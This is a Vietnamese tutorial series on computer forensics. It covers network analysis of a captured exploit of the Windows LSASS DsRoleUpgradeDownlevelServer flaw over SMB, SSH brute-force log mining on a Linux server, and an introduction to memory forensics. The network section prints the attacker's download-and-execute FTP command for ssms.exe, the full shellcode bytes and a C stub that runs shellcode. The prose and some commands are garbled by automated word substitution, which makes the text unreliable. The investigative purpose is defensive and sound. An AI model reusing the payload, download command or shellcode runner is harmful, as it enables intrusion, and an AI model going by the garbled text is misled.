Computer Forensics Là Gì

     

Bạn đã xem bạn dạng rút gọn gàng của tài liệu. Coi và download ngay phiên bản đầy đầy đủ của tài liệu tại phía trên (664.47 KB, 33 trang )




Bạn đang xem: Computer forensics là gì

Mục lụcContentsForensic 1 - Tổng quan lại về Computer ForensicsCó thể bạn đã hiểu được chỗ nào đó về Forensics, Digital Forensics tuyệt Computer Forensics dẫu vậy vẫn chưa xuất hiện một hình dung ví dụ về các khái niệm này. Thực tiễn thì Computer Forensics chưa phải là khái niệm xa lạ với tín đồ làm an ninh thông tin, nhưng với số đông bọn họ ở trên đây thì có lẽ rằng nó vẫn còn đó là một sản phẩm công nghệ khá mới mẻ. Trong loạt nội dung bài viết sắp tới, tôi hy vọng sẽ giúp các bạn hiểu rộng về Computer Forensics và công việc của những người dân làm trong nghành nghề này.Computer Forensics Là gì ?Trong lĩnh vực an ninh thông tin, Computer Forensics hay nói một cách khác là điều tra số là các bước phát hiện, bảo vệ và phân tích tin tức được lưu trữ, truyền download hoặc được tạo ra bởi một máy tính hoặc mạng sản phẩm tính, nhằm đưa ra các suy luận hợp lý và phải chăng để tìm nguyên nhân, giải thích các hiện tượng lạ trong quy trình điều tra.Khái niệm Forensics(Forensic Science - khoa học pháp y) như tên thường gọi của nó khởi thủy từ nghành nghề dịch vụ y tế từ cố kỉnh kỷ 18 và liên quan đến khảo sát pháp y. Ngày nay Forensics vẫn được không ngừng mở rộng ra không ít lĩnh vực khác.Computer Forensics ra đời vào trong thời điểm 1980 bởi vì sự phân phát triển của dòng sản phẩm tính cá nhân, khi xẩy ra trộm cắp thiết bị phần cứng, mất mát dữ liệu, vi phạm phiên bản quyền, virus máy tính phá hoại các doanh nghiệp và chính phủ các nước khi này cũng ý thức rộng về vấn đề bảo mật.Từ phía trên và trong những loạt bài về sau, khi tôi sử dụng từ Forensics thì mọi tín đồ hiểu là đang nói tới Computer Forensics.Mục tiêu ?Mục tiêu mấu chốt của Computer Forensic là phát hiện, bảo quản, khai thác, tư liệu hóa và gửi ra tóm lại về dữ liệu thu thập được. Cần xem xét rằng tài liệu phải đảm bảo an toàn tính xác thực, và được mang mà không xẩy ra hư hại, còn nếu như không dữ liệu đấy sẽ không còn ý nghĩa.Tại sao yêu cầu Forensics ?
Nếu chúng ta là người chủ sở hữu của một website nào đấy, một ngày đẹp nhất trời website của doanh nghiệp bị tin tặc ghé thăm với để lại phần đa hậu quả không hy vọng muốn. Bạn muốn xác định tại sao bị tấn công, tìm cách khắc phục để vấn đề không tái diễn xuất xắc xa rộng là xác định thủ phạm. Đó là lúc bạn cần đến Forensics.Đấy chỉ là một ví dụ tương đối điển hình, bên cạnh đó còn hồ hết trường hợp khác ví như để phát hiện tại mã độc trên trang bị tính, kiểm soát sự phi lý trong mạng, phát hiện nay sự đột nhập Nói bình thường Forensics giúp họ xác định được vì sao sự núm và đưa ra những biện pháp giải quyết tiếp theo.Nói về Forensics thì quan trọng không nhắc đến một nguyên tắc kinh khủng của kỹ thuật điều traNguyên tắc dàn xếp của LocardEdmond Locard(1877 – 1966) được ca ngợi là Sherlock Holmes của nước Pháp. Ông là một chuyên viên điều tra pháp y, tạo nên Viện Hình sự học tập của ngôi trường Đại học tập Tổng thích hợp Lyon. Locard phát biểu một vẻ ngoài mà sau đây trở thành mục tiêu ngành khoa học điều tra. Ông ta cho rằng bất cứ lúc nào hai tín đồ tiếp xúc với nhau, một thứ nào đấy từ một người sẽ được trao đổi với những người khác cùng ngược lại. Hoàn toàn có thể là bụi, tế bào da, bùn đất, sợi, mạt kim loại. Nhưng việc trao đổi này có xảy ra - vì thế chúng ta có thể bắt được nghi phạm.Với Computer Forensics, nguyên tắc này cũng hoàn toàn đúng. Khi chúng ta làm việc với vật dụng tính hay là 1 hệ thống thông tin, tất cả hành động của chúng ta đều bị ghi vết lại (mặc dù việc tìm và đào bới ra hung thủ trong trường hòa hợp này khó khăn và mất quá nhiều thời gian hơn cực kỳ nhiều)Đặc điểm của Computer Forensics• dữ liệu cần phân tích lớn, nếu tài liệu chỉ là toptrungtamanhngu.com thôi thì với dung lượng vài mb chúng ta cũng có 1 lượng thông tin không nhỏ rồi. Trong thực tế thì còn to đùng hơn.• dữ liệu thường không còn nguyên vẹn, bị cầm đổi, phân mảnh, và có thể bị lỗi• bảo quản dữ liệu khó khăn, tài liệu thu được hoàn toàn có thể có tính trọn vẹn
cao, chỉ một nắm đổi nhỏ tuổi cũng rất có thể làm ảnh hưởng đến vớ cả.• dữ liệu forensic có thể gồm nhiều các loại khác nhau: file hệ thống, ứng dụng, • sự việc cần forensics là tương đối trừu tượng: mã máy, dump file, network packet • Dữ liệu thuận lợi bị trả mạo• xác định tội pham nặng nề khăn, hoàn toàn có thể bạn tìm thấy được tài liệu về hacker(IP, email, profile ) tuy thế để xác minh được được đối tượng người tiêu dùng thật ngoài đời thì cũng không thể đơn giản.Forensics rất nhiều gì ?Computer Forensic thường thao tác với những đối tượng người dùng sau:• Physical Media, media Management: tương quan đến phần cứng, tổ chức phân vùng, hồi sinh dữ liệu khi bị xóa • file System: Phân tích các file hệ thống, hệ điều hành quản lý windows, linux, apk • Application: Phân tích dữ liệu từ vận dụng như các file Log, file cấu hình, reverse ứng dụng • Network: so với gói tin mạng, sự không bình thường trong mạng• Memory: Phân tích dữ liệu trên bộ nhớ, hay là dữ liệu lưu bên trên RAM được dump raAi làm cho Forensic ?Những fan làm công việc Forensics thường nên có tay nghề và kiến thức và kỹ năng khá rộng lớn về kỹ thuật máy tính, mạng, bảo mật. Một trong những trường phù hợp cần kiến thức và kỹ năng chuyên sâu, sẽ có không ít người cùng tham gia để giải quyết. Ở những doanh nghiệp lớn, những người làm bình an vận hành(Security Operator) đã đảm nhận quá trình này. Với những người làm bảo mật thông tin thì đó cũng là một công việc rất thú vị.Forensic 2 - Network ForensicsTrong bài xích Tổng quan lại về Computer Forensics lần trước, tôi sẽ đề cập qua về định nghĩa Forensics, sệt điểm cũng như những mảng Forensics thường tiếp
cận. Nội dung bài viết lần này, tôi hy vọng đề cập cụ thể hơn về Forensics trên môi trường xung quanh mạng, hay có cách gọi khác là Network Forensics.Công bài toán chính của group này là thu thập và phân tích các gói tin được truyền qua các thiết bị đầu cuối, từ kia phát hiện, cảnh báo các dấu hiệu không bình thường trong hệ thống mạng.Cũng cần nói thêm, trong lĩnh vực Forensics, chế độ là thứ luôn luôn phải có sau kỹ năng và với mỗi nhiều loại thì thông thường có những chính sách chuyên dụng. Các bạn sẽ thấy rõ vấn đề này qua bài bác này và các bài cụ thể khác về sau. Cùng với Network Forensics, chúng ta có • Wireshark, Network Miner bắt và phân tích gói tin với đồ họa đồ họa• Tcpdump so với gói tin với giao diện console• p0f dùng để phát hiện nay hệ điều hành, console bên trên nền Linux• netcat, debug kết nối, nhập vai trò cả client với server, console bên trên windows với linux• Snort, opensource phát hiện xâm nhập• Nmap, tcpxtract, ssldump, nslookup, maxmind và tương đối nhiều công vậy khácCase-Study: Một máy tính trong mạng nội cỗ bị nghi ngờ tấn công từ bỏ xa, cai quản trị mạng dùng gần như công cụ chuyên sử dụng bắt các kết nối mang lại máy nạn nhân vào thời gian diễn ra cuộc tấn công. Tiếp nối dump ra cục bộ nội dung này ra file(Link tải). Yêu ước phân tích tệp tin dump cùng tìm ra bắt đầu và lý do vụ tiến công để có chiến thuật khắc phục. Để giải quyết và xử lý yêu cầu trên, bọn họ sẽ thứu tự vượt qua từng sự việc nhỏ. Lưu ý ở đây file dump tất cả đuôi mở rộng .pcap(packet capture), tôi sẽ thực hiện wireshark là cách thức phân tích chính. Wireshark là 1 trong những chương trình bắt với phân tích gói tin, giao thức siêu mạnh, cụ thể về nó mọi người dân có thể bài viết liên quan ở phần đa tài liệu khác.1. Địa chỉ IP của kẻ tiến công và của nạn nhânMở tệp tin .pcap bởi wireshark, chúng ta có thể thấy tức thì danh sách các gói tin truy vấn đến lắp thêm nạn nhân
Vào menu Statistics/Enpoint List/IP v4 để xem danh sách các IP bắt được.Có toàn bộ 2 IP:• 192.150.11.111 là IP nội bộ, chính là IP của nạn nhân• 98.114.205.102 là IP của kẻ tấn công2. Thông tin về kẻ tấn côngXem xét một gói tin nắm thể:Thông tin trong khung chi tiết gói tin, mang đến ta biết sản phẩm công nghệ kẻ tiến công có địa chỉ cửa hàng MAC là 0008e23b5601(Cisco) Để tra cứu thêm thông tin về IP, chúng ta có thể dùng các công vắt geoip, whois trực con đường hay tích hợp luôn luôn và wireshark như lý giải ở bài này http://forum.whitehat.vn/threads/541 Wireshark.html Tôi thực hiện trang http://cqcounter.com/ và ra được một trong những thông tin như thế này:3. Có bao nhiêu phiên TCP(TCP session) trong tệp tin dump này ?Khi chú ý vào khung chủ yếu của wireshark các bạn sẽ thấy có rất nhiều gói tin, nhưng đa phần trong bọn chúng là phần đa gói tin chào hỏi, xác thực, truyền nhận dữ liệu của một phiên TCP như thế nào đóĐể coi số phiên TCP hiện có, vào menu Statistics > Conversations, tab TCP. Chúng ta sẽ thấy thực tế chỉ tất cả 5 phiên qua các cổng khác nhau:4. Cuộc tấn công kéo dãn dài bao lâu ?Chỉ phải xem thời hạn của frame trước tiên và frame sau cùng là đang câu trả lời- Frame đầu tiên: - Frame cuối cùng:Như vậy cuộc tấn công ra mắt trong khoảng 16 giây.5. Thương mại dịch vụ nào trên vật dụng nạn nhân hoàn toàn có thể là phương châm tấn công ? Lỗ hổng là gì ?Nhìn vào các phiên TCP được liệt kê phía trên, tôi để ý đến cổng 445 của sản phẩm nạn nhân. Đây là cổng chạy giao thức SMB(Server Message Block), cung cấp khả năng chia sẻ file giữa các máy tính xách tay hoặc sản phẩm công nghệ in với máy tính. SMB từng được nghe biết với việc dính một số lỗ hổng bảo mật.
Lọc các Packet theo info, chăm nom lần lượt tôi phát hiện nay thêm một nghi ngại mới:Nếu chúng ta thử Google thì đang biết DsRoleUpgradeDownlevelServer là 1 hàm trong thư viện NETAPI32.dll chạy dịch vụ thương mại Local Security Authority Subsystem Service(LSASS) trên windows thông qua giao thức SMB. Và điều quan trọng là LSASS từng dính kèm lỗi bảo mật thông tin với hàm DsRoleUpgradeDownlevelServer(), chi tiết lỗi được công bố tại CVE-2003-0533(http://www.cve.mitre.org/cgi-bin/cve =CAN-2003-0533). Microsoft cũng đã đưa ra phiên bản vá đến lỗi này cùng với mã update MS04-011(http://technet.microsoft.com/en-us/s letin/ms04-011).Từ đây chúng ta có thêm một tóm lại là laptop nạn nhân chạy hệ quản lý điều hành windows, cụ thể là windows xp hoặc windows 2000. Chúng ta có thể kiểm tra vấn đề đó bằng việc lọc những gói tin SMB và xem nằm trong tính native OS trong đó:Vậy là chúng ta đã biết được một vài thông tin về kẻ tấn công, biết được thương mại & dịch vụ nào trên sản phẩm nạn nhân là phương châm của cuộc tiến công này. Tôi tạm dừng ở đây, ở bài xích tiếp theo chúng ta sẽ so sánh kỹ hơn giải pháp hacker triển khai vụ tấn công, hắn đang làm như thế nào để khai quật lỗ hổng trên.Forensic 3 - Network Forensics(tiếp)Chúng ta tiếp tục với Case Study về Network Forensics, vào phần này tôi vẫn đề cập sâu rộng về cuộc tiến công của Hacker6. Mô phỏng lại cuộc tiến công của Hacker6.1. Quét cổng 445 để xem cổng này còn có mở không, vấn đề đó thể hiện qua các gói tin SYN, SYN/ACK, ACK, FYN liên tục6.2. Tùy chỉnh cấu hình kết nối IPC cùng request đến thương mại dịch vụ lsarpcBạn đọc gồm thể bài viết liên quan về hình thức kết nối IPC$, ở chỗ này hacker đã gửi kết nối với giá trị username cùng password đều rỗng, còn được biết đến với kiểu tiến công Null Session.6.3. Khai thác lỗi Buffer Over Flow của hàm DsRoleUpgradeDownlevelServer() trải qua việc truyền shellcode(Frame #33)6.4. Shellcode mở cổng 1957 chất nhận được backdoor điều khiển xe trên đó, tin tặc
qua cổng này truyền command vào(Frame #42)Lệnh mà hacker triển khai là:Mã:echo xuất hiện 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exeLệnh này có chức năng yêu cầu máy nạn nhân liên kết ftp cho cổng 8884 của tin tặc và tải về file ssms.exe kế tiếp thực thi file này. Đến phía trên việc khai thác coi như trả thành.Mọi người dân có thể chú ý thêm những frame từ #71 về sau, đây là các đoạn nhấn file ssms.exe, tệp tin được gửi qua socket thành những mảnh nhỏ tuổi và ghép lại sau đó7. Truy tra cứu mã độcNhư vậy là chúng ta đã hình dung được cuộc tấn công xảy ra như thế nào, nhưng một vụ điều tra thì không những có vậy. Phải xác định được mã độc mà tin tặc sử dụng chuyển động như cầm nào, dẫu vậy trước hết yêu cầu thu được mẫu này.Đầu tiên là Shellcode mà tin tặc đã sử dụng. Lựa chọn Frame #33, trong size Packet Bytes chọn chế độ Reassembled TCP họ sẽ thấy rất đầy đủ nội dung mà hacker gửi cho máy nàn nhân.(Khi gửi tin qua TCP thì dữ liệu rất có thể phân mảnh ở những gói tin khác nhau, Reassembled TCP đang giúp chúng ta ghép các mảnh dữ liệu đó lại với nhau)Sau khi đào thải các lệnh NOPE(mã 90) thì nhận được shellcode đích thực mà tin tặc đã dùng:Mã:xebx10x5ax4ax33xc9x66xb9x7dx01x80x34x0ax99xe2xfaxebx05xe8xebxffxffxffx70x95x98x99x99xc3xfdx38xa9x99x99x99x12xd9x95x12xe9x85x34x12xd9x91x12x41x12xeaxa5x12xedx87xe1x9ax6ax12xe7xb9x9ax62x12xd7x8dxaax74xcfxcexc8x12xa6x9ax62x12x6bxf3x97xc0x6ax3fxedx91xc0xc6x1ax5ex9dxdcx7bx70xc0xc6xc7x12x54x12xdfxbdx9ax
5ax48x78x9ax58xaax50xffx12x91x12xdfx85x9ax5ax58x78x9bx9ax58x12x99x9ax5ax12x63x12x6ex1ax5fx97x12x49xf3x9axc0x71x1ex99x99x99x1ax5fx94xcbxcfx66xcex65xc3x12x41xf3x9cxc0x71xedx99x99x99xc9xc9xc9xc9xf3x98xf3x9bx66xcex75x12x41x5ex9ex9bx99x9ex3cxaax59x10xdex9dxf3x89xcexcax66xcex69xf3x98xcax66xcex6dxc9xc9xcax66xcex61x12x49x1ax75xddx12x6dxaax59xf3x89xc0x10x9dx17x7bx62x10xcfxa1x10xcfxa5x10xcfxd9xffx5exdfxb5x98x98x14xdex89xc9xcfxaax50xc8xc8xc8xf3x98xc8xc8x5exdexa5xfaxf4xfdx99x14xdexa5xc9xc8x66xcex79xcbx66xcex65xcax66xcex65xc9x66xcex7dxaax59x35x1cx59xecx60xc8xcbxcfxcax66x4bxc3xc0x32x7bx77xaax59x5ax71x76x67x66x66xdexfcxedxc9xebxf6xfaxd8xfdxfdxebxfcxeaxeax99xdaxebxfcxf8xedxfcxc9xebxf6xfaxfcxeaxeaxd8x99xdcxe1xf0xedxcdxf1xebxfcxf8xfdx99xd5xf6xf8xfdxd5xf0xfbxebxf8xebxe0xd8x99xeexeaxabxc6xaaxabx99xcexcaxd8xcaxf6xfaxf2xfcxedxd8x99xfbxf0xf7xfdx99xf5xf0xeaxedxfcxf7x99xf8xfaxfaxfcxe9xedx99xfaxf5xf6xeaxfcxeaxf6xfaxf2xfcxedx99Chúng ta thực hiện phục hồi shellcode này bằng cách đưa đoạn shellcode này vào trong 1 chương trình chạy thử shell như vậy này:Mã:#include#include unsigned char code<> = ""; int main() int (*ret)() = (int(*)())code; ret();
Với tệp tin ssms.exe, như tôi đã trình bày tại phần trước được download về đồ vật nạn nhân thông qua socket và cũng trở nên phân mảnh trong vô số nhiều gói tin. Gộp file đầy đủ bằng phương pháp sử dụng kĩ năng Follow TCP Stream của WiresharkSave As file này ra .exe8. Phân tích mã độcỞ bước trên, bọn họ đã nhận được một file shellcode và một file ssms.exe. Việc tiếp theo là phân tích ví dụ xem gần như file thực hiện này thao tác làm việc gì trên thứ nạn nhân. độc giả nên tìm hiểu thêm lọat bài về Reverse Engineering trên WhiteHat để làm rõ về quá trình này. Tôi sẽ không còn phân tích kỹ công đoạn này ở đây, lí bởi là sẽ vượt xa phạm vi chủ thể Network Forensics. Kết quả kiểm tra ssms.exe bên trên virustotal cũng không mấy không thể tinh được khi 48/51 AV dìm diện là virus:https://www.virustotal.com/en/file/b is/1396850758/Đến đây cuộc điều tra cũng hoàn toàn có thể xem như đi mang đến hồi kết, chúng ta đã tìm ra được một số trong những thông tin về hacker (mặc dù để tìm ra kẻ tấn công ngoài đời thì cần dựa vào cả vào yếu ớt tố luật pháp hơn). Dưới góc độ kỹ thuật thì chúng ta biết được cách tin tặc tấn công khối hệ thống như nỗ lực nào, biết được khối hệ thống bị dính phần đông lỗ hổng gì với những nguy cơ tiềm ẩn trong các số ấy để cập nhật phiên bản vá cùng khắc phục sự vậy không tái diễn trong tương lai.Forensic 4 - Log MiningLog là một trong những dữ liệu quan trọng đặc biệt trong vượt trình điều tra số, đa số tất cả vết tích của một cuộc tấn công đều được giữ gìn tại đây. Log Mining hay Log Forensics là thuật ngữ để chỉ về một cuộc điều tra dựa trên Log.Mặc cho dù chứa không ít thông tin gồm ích, nhưng vấn đề phân tích Log lại không còn đơn giản. Dữ liệu lớn, những file riêng biệt lẻ, từng loại gồm một cấu trúc khác nhau và rất có thể bị xóa, sửa thay đổi là những bất lợi khi thao tác làm việc với Log. Việc phân tích Log có thể sử dụng một số trong những công vắt như:• Apache Log Viewer(chuyên dùng phân tích log Apache)
• Log Parse(chuyên dùng phân tích các loại log của Microsoft như IIS, NCSA )• Logwatch(monitor log trên linux)• web Log Expert• Splunk(monitor, phân tích big data, những log dung lượng lớn, mất phí) dường như notepad hay các script trường đoản cú viết cũng là những luật hữu ích nhằm đọc log.Case-Study: Một máy chủ linux bị nghi ngờ xâm nhập, tổng thể log đã có được backup ra tại đây. Kiếm tìm hiểu chi tiết về cuộc tấn công này.Toàn bộ log tại đây đều trên linux, nhằm hiểu hơn về những loại log trong môi trường này bạn nên xem qua sinh sống đây: https://help.ubuntu.com/community/LinuxLogFiles 1 hệ thống có dấu hiệu bị đột nhập không? cùng nếu có thì cách thức tấn công là gì ?Kiểm tra tệp tin auth.log(đây là log tuyệt đối của hệ thống trên linux, có thể tìm thấy tại /var/log/auth.log), bọn họ sẽ thấy sự bất thường:Mã:Apr 19 05:26:04 app-1 sshd<7369>: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.17.30.49 user=rootApr 19 05:26:06 app-1 sshd<7369>: Failed password for root from 58.17.30.49 port 53236 ssh2Apr 19 05:26:08 app-1 sshd<7371>: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.17.30.49 user=rootApr 19 05:26:10 app-1 sshd<7371>: Failed password for root from 58.17.30.49 port 53453 ssh2Apr 19 05:26:12 app-1 sshd<7373>: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.17.30.49 user=rootApr 19 05:26:15 app-1 sshd<7373>: Failed password for root from 58.17.30.49 port 53655 ssh2
Apr 19 05:26:17 app-1 sshd<7375>: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.17.30.49 user=rootTrong 1 giây có một loạt request yêu mong đăng nhập bị thất bại, chứng tỏ kẻ tiến công đang tìm phương pháp “đoán”(bruteforce) mật khẩu nhằm đăng nhập khối hệ thống thông qua SSH.2 bao gồm bao nhiêu IP thực hiện tiến công ? bao nhiêu trong đó tiến công thành công ?Khoanh vùng các IP triển khai việc brute force phía trên, có thể xác định được 28 IP tấn công tất cả, trong các số ấy có 6 IP sẽ brute force thành công.Mã:Apr 19 05:42:27 app-1 sshd<9031>: Accepted password for root from 219.150.161.20 port 40877 ssh2Apr 19 10:45:36 app-1 sshd<28030>: Accepted password for root from 222.66.204.246 port 48208 ssh2Apr 19 22:37:24 app-1 sshd<2012>: Accepted password for root from 190.166.87.164 port 50753 ssh2Lưu ý là tôi chỉ liệt kê một phần của log. Danh sách những IP sẽ thành công:• 219.150.161.20• 222.66.204.246• 121.11.66.70• 222.169.224.197• 122.226.202.12• 61.168.227.12Một điểm khá thú vui là 2 IP 121.11.66.70 với 222.66.204.246 vẫn triển khai brute force sau thời điểm đã attack thành công.Công câu hỏi phân tích này có thể đơn giản hóa bằng phương pháp viết những script để triển khai một biện pháp tự động.3 Chuyện gì xẩy ra sau khi hệ thống bị xâm nhập?Thời điểm thứ nhất mà log ghi nhận sự xâm nhập thành công là vào Apr 19


Xem thêm: Nên Tặng Quà Sinh Nhật Gì Cho Bố Dịp Sinh Nhật 40, 50, 60 Tuổi Thiết Thực

05:41:44 từ showroom 219.150.161.20.Quan sát các đoạn log không giống từ sau thời khắc này, họ thấy:• tự auth.log, có một số trong những user được tạo mới như packet, dhg, messagebus, fido, wind3str0y. Tìm kiếm log với tự khóa useradd giúp thấy kết quả• Ứng dụng được cài thêm như nmap, psybnc, eggdrop, exim mail cái này kiểm soát qua log apt và dpkg, đây là nơi lưu lại log cài, setting ứng dụng.• Mở cổng inbound 2424, 53, 113. Xem nghỉ ngơi auth.logMã:Apr 24 20:03:06 app-1 sudo: root : TTY=pts/2 ; PWD=/etc ; USER=root ; COMMAND=/sbin/iptables -A input đầu vào -p ssh -dport 2424 -j ACCEPTApr 24 20:03:44 app-1 sudo: root : TTY=pts/2 ; PWD=/etc ; USER=root ; COMMAND=/sbin/iptables -A input -p tcp -dport 53 -j ACCEPTApr 24 20:04:13 app-1 sudo: root : TTY=pts/2 ; PWD=/etc ; USER=root ; COMMAND=/sbin/iptables -A đầu vào -p udp -dport 53 -j ACCEPTApr 24 20:06:22 app-1 sudo: root : TTY=pts/2 ; PWD=/etc ; USER=root ; COMMAND=/sbin/iptables -A đầu vào -p tcp dport ssh -j ACCEPTApr 24 20:11:00 app-1 sudo: root : TTY=pts/2 ; PWD=/etc ; USER=root ; COMMAND=/sbin/iptables -A input đầu vào -p tcp dport 53 -j ACCEPTApr 24 20:11:08 app-1 sudo: root : TTY=pts/2 ; PWD=/etc ; USER=root ; COMMAND=/sbin/iptables -A đầu vào -p tcp dport 113 -j ACCEPT4 server này còn tồn tại những vấn đề gì không giống ?• rõ ràng là SSH được cho phép truy cập tài khoản root, password yếu dẫn tới sự việc bị bruteforce• tự daemon.log thấy:Mã:Mar 18 10:18:42 app-1 /etc/mysql/debian-start<7566>: WARNING: mysql.user contains 2 root accounts without password!2 thông tin tài khoản root không để mật khẩu, Đây cụ thể là một vấn đề an toàn nghiêm trọng, vị lỗi cấu hình của quản lí trị viên• Log access của web cho thấy thêm có một số ít request nhờ vào server thành 1 proxy,
nhưng đã bị chặn.Mã:221.192.199.35 - - <19/Apr/2010:09:23:37 -0700> "GET http://www.wantsfly.com/prx2.php?hash=FABB83E72D135F1018046CC4005088B36F8D0BEDCEA7 HTTP/1.0" 404 1466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" YhL5XgoAAQ4AAEP2EQcAAAAC 11250471Forensic 5 - Memory ForensicsGiới thiệu:- Trước hết, xin được phép nhắc lại kỹ năng và kiến thức về Computer Foresic đã có được đề cập vào các nội dung bài viết trước trên whitehat forum:“Computer Forensics Là gì ?Trong lĩnh vực an ninh thông tin, Computer Forensics hay nói một cách khác là điều tra số là công việc phát hiện, đảm bảo an toàn và phân tích thông tin được giữ trữ, truyền tải hoặc được tạo ra bởi một máy tính xách tay hoặc mạng máy tính, nhằm đưa ra những suy luận phù hợp để tra cứu nguyên nhân, phân tích và lý giải các hiện tượng kỳ lạ trong quá trình điều tra.”- Trong nội dung bài viết này, chúng ta đề cập cho Memory Forensics, trên đây cũng là 1 mảng đặc trưng và cũng khá thú vị của forensics với đối tượng người sử dụng là tài liệu được lưu lại trên cỗ nhớ, thường xuyên là tài liệu được dump ra trường đoản cú RAM.- Memory Forensics mang những đặc điểm chung của Computer Forensics là:+ tài liệu cần so với thường béo hoặc khôn cùng lớn+ Dữ liệu hoàn toàn có thể không còn nguyên vẹn, bị cố đổi, bị phần mảng.+ Dữ liệu dễ dãi bị đưa mạoCông cụ:- hiện tại để dump tài liệu từ RAM trên Windows, ta rất có thể sử dụng những qui định như DumpIt…- Để đối chiếu file dump, thời kì đầu các chuyên gia về Memory Forensics thường áp dụng những strings cùng grep, đây là những chế độ tìm kiếm tài liệu trong tệp tin theo khuôn mẫu chứ không hề được cải cách và phát triển cho Forensics.
- Về sau, mở ra những vẻ ngoài được phân phát triển giành riêng cho Memory Forensics như Volatility, MoonSols…Case study:Bạn nhận được một tệp tin dmp từ bỏ một laptop bị tấn công. Hãy tìm giải pháp lấy ra được nhiều thông tin nhất có thể về sự cố.File:xcom.vmemCông cụ:Volatility1. Lấy tin tức về HĐH:


*
làm chủ nhà nước trong nghành nghề dịch vụ an toàn, lau chùi và vệ sinh lao đụng theo điều khoản lao động nước ta 17 3 79
*
gợi ý về xử phạt vi phạm luật hành chủ yếu trong nghành nghề dịch vụ kế toán ppt 1 834 3
*
các điểm mới về xử phạt vi phạm hành bao gồm trong nghành nghề kế toán potx 2 644 0
*
đái luận nhân viên chuyên viên chủ yếu Xử lý tình huống làm chủ hành bao gồm trong lĩnh vực bình an vệ sinh lương thực 11 11 134
*
Luận văn thạc sĩ : cai quản nhà nước trong lĩnh vực bình an vệ sinh lao rượu cồn theo luật pháp lao động việt nam 122 1 8
*
TỔNG quan tiền VỀ ĐÔ THỊ VÀ NHỮNG ẢNH HƯỞNG ĐÊN TRẬT TỰ AN TOÀN GIAO THÔNG 98 232 0
*
HƯỚNG DẪN THỰC HIỆN MỘT SỐ ĐIỀU CỦA NGHỊ ĐỊNH 1852004NĐCP NGÀY 4112004 VÀ NGHỊ ĐỊNH SỐ 392011NĐCP NGÀY 2652011 SỬA ĐỔI, BỔ SUNG MỘT SỐ ĐIỀU CỦA NGHỊ ĐỊNH 1852004NĐCP CỦA CHÍNH PHỦ VỀ XỬ PHẠT VI PHẠM HÀNH CHÍNH trong LĨNH VỰC KẾ TOÁN 16 549 0
*
cai quản nhà nước trong nghành nghề an toàn, dọn dẹp vệ sinh lao rượu cồn theo luật pháp lao động vn 13 283 0


Xem thêm: Nghĩa Của Từ Frosting Là Gì ? 3 Cách Làm Frosting Đơn Giản Tại Nhà

*
bảo đảm người chi tiêu và sử dụng trong lĩnh vực an toàn, lau chùi thực phẩm theo điều khoản nước ta bây giờ 78 661 3